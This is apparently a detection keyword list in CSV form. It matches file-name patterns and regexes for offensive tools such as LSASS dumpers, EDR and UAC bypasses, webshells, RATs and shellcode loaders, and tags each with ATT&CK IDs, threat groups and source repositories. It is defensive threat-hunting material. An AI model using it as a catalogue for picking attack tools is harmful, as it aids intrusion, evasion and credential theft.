"*\sherlock.exe*",".{0,1000}\\sherlock\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","18795"
"*\Shhhavoc.py*",".{0,1000}\\Shhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","18796"
"*\Shhmon.*",".{0,1000}\\Shhmon\..{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","0","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","18797"
"*\Shhmon.exe*",".{0,1000}\\Shhmon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18798"
"*\Shhmon.exe*",".{0,1000}\\Shhmon\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18799"
"*\Shhmon.exe*",".{0,1000}\\Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18800"
"*\ShimDB\sdb-explorer*",".{0,1000}\\ShimDB\\sdb\-explorer.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","18801"
"*\ShimInjector.cpp*",".{0,1000}\\ShimInjector\.cpp.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","18802"
"*\ShimInjector.cpp*",".{0,1000}\\ShimInjector\.cpp.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","18803"
"*\ShimInjector.exe*",".{0,1000}\\ShimInjector\.exe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","18804"
"*\ShInject.exe*",".{0,1000}\\ShInject\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","18805"
"*\Shock.exe knowndlls*",".{0,1000}\\Shock\.exe\sknowndlls.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","18806"
"*\Shoggoth.exe*",".{0,1000}\\Shoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","18807"
"*\Shoggoth.pptx*",".{0,1000}\\Shoggoth\.pptx.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","18808"
"*\Shoggoth.sln*",".{0,1000}\\Shoggoth\.sln.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","18809"
"*\ShoggothEngine.cpp*",".{0,1000}\\ShoggothEngine\.cpp.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","18810"
"*\Shu1337.php*",".{0,1000}\\Shu1337\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18812"
"*\shutter-main.zip*",".{0,1000}\\shutter\-main\.zip.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","18813"
"*\Shwmae.exe*",".{0,1000}\\Shwmae\.exe.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","18814"
"*\SigFlip.exe*",".{0,1000}\\SigFlip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","18816"
"*\SigFlip.exe*",".{0,1000}\\SigFlip\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18817"
"*\SigmaPotato.csproj*",".{0,1000}\\SigmaPotato\.csproj.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","18818"
"*\signed-executables\svchost.exe*",".{0,1000}\\signed\-executables\\svchost\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","18819"
"*\SignToolEx.cpp*",".{0,1000}\\SignToolEx\.cpp.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","18820"
"*\SignToolEx.sln*",".{0,1000}\\SignToolEx\.sln.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","18821"
"*\SignToolExDll*",".{0,1000}\\SignToolExDll.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","18822"
"*\sigthief.exe*",".{0,1000}\\sigthief\.exe.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","18823"
"*\sigthief.py*",".{0,1000}\\sigthief\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","18824"
"*\Silent.7z*",".{0,1000}\\Silent\.7z.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","18825"
"*\SilentClean.exe*",".{0,1000}\\SilentClean\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","18826"
"*\SilentCryptoMiner\*",".{0,1000}\\SilentCryptoMiner\\.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","18827"
"*\SilentProcessExit.sln*",".{0,1000}\\SilentProcessExit\.sln.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","18828"
"*\silic webshell.jsp*",".{0,1000}\\silic\swebshell\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18829"
"*\SillyRAT\*.py",".{0,1000}\\SillyRAT\\.{0,1000}\.py","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","18830"
"*\SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php*",".{0,1000}\\SimAttacker\s\-\sVrsion\s1\.0\.0\s\-\spriv8\s4\sMy\sfriend\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18831"
"*\simple-backdoor.php*",".{0,1000}\\simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","N/A","10","","N/A","","","","18832"
"*\simple-backdoor.php*",".{0,1000}\\simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18833"
"*\SimpleLoader.cpp*",".{0,1000}\\SimpleLoader\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","18841"
"*\SimpleLoader.exe*",".{0,1000}\\SimpleLoader\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","18842"
"*\simpleXORencoder.c*",".{0,1000}\\simpleXORencoder\.c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","18844"
"*\SimShell 1.0 - Simorgh Security MGZ.php*",".{0,1000}\\SimShell\s1\.0\s\-\sSimorgh\sSecurity\sMGZ\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18845"
"*\SingleDose.csproj*",".{0,1000}\\SingleDose\.csproj.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","18846"
"*\SingleDose.exe*",".{0,1000}\\SingleDose\.exe.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","18847"
"*\SingleDose.sln*",".{0,1000}\\SingleDose\.sln.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","18848"
"*\SingleDose-main.zip*",".{0,1000}\\SingleDose\-main\.zip.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","18849"
"*\S-inject.exe*",".{0,1000}\\S\-inject\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","18850"
"*\S-inject.vcxproj*",".{0,1000}\\S\-inject\.vcxproj.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","18851"
"*\S-inject_x64.exe*",".{0,1000}\\S\-inject_x64\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","18852"
"*\S-inject_x86.exe*",".{0,1000}\\S\-inject_x86\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","18853"
"*\Sirep_Command_Payload.bt*",".{0,1000}\\Sirep_Command_Payload\.bt.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18854"
"*\SirepRAT.py*",".{0,1000}\\SirepRAT\.py.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18855"
"*\SirepRAT\*",".{0,1000}\\SirepRAT\\.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18856"
"*\SirepRAT-2.0.0\*",".{0,1000}\\SirepRAT\-2\.0\.0\\.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18857"
"*\SirepRAT-master*",".{0,1000}\\SirepRAT\-master.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18858"
"*\sitadel.log*",".{0,1000}\\sitadel\.log.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","18861"
"*\sl0p.dll*",".{0,1000}\\sl0p\.dll.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for Windows","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/ASkyeye/win-server2022-UAC-Bypass","1","0","N/A","N/A","9","1","0","1","2024-02-04T00:10:43Z","2021-09-25T03:36:02Z","18862"
"*\SlayerRAT v*.exe*",".{0,1000}\\SlayerRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18864"
"*\slinky.py*",".{0,1000}\\slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18865"
